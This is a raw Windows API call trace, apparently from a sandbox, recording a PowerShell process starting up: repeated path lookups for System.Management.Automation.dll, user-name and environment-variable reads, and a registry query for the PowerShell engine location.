	[0408.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.472] CoTaskMemAlloc (cb=0x804) returned 0x1b97a6a0
	[0408.472] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b97a6a0, nSize=0x26d7b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d7b8) returned 0x1
	[0408.473] CoTaskMemFree (pv=0x1b97a6a0) 
	[0408.473] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0408.473] GetUserNameW (in: lpBuffer=0x41e820, pcbBuffer=0x26d7f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d7f8) returned 1
	[0408.473] CoTaskMemFree (pv=0x41e820) 
	[0408.475] ReportEventW (hEventLog=0x1ba70008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31a5a18*="Available", lpRawData=0x31a57a8) returned 1
	[0408.521] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0408.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.521] CoTaskMemFree (pv=0x46a6b0) 
	[0408.523] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0408.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.523] CoTaskMemFree (pv=0x46a6b0) 
	[0408.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.529] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0408.529] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0408.529] CoTaskMemFree (pv=0x46a6b0) 
	[0408.530] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0408.530] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0408.530] CoTaskMemFree (pv=0x46a6b0) 
	[0408.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.532] GetCurrentProcessId () returned 0x324
	[0408.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d7d8 | out: phkResult=0x26d7d8*=0x360) returned 0x0
	[0408.537] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d75c, lpData=0x0, lpcbData=0x26d758*=0x0 | out: lpType=0x26d75c*=0x1, lpData=0x0, lpcbData=0x26d758*=0x56) returned 0x0
	[0408.537] CoTaskMemAlloc (cb=0x5a) returned 0x49c280
	[0408.537] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d72c, lpData=0x49c280, lpcbData=0x26d728*=0x56 | out: lpType=0x26d72c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d728*=0x56) returned 0x0
	[0408.537] CoTaskMemFree (pv=0x49c280) 
	[0408.537] RegCloseKey (hKey=0x360) returned 0x0
	[0408.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.540] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0408.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0408.540] CoTaskMemFree (pv=0x46a6b0) 
	[0408.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0408.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
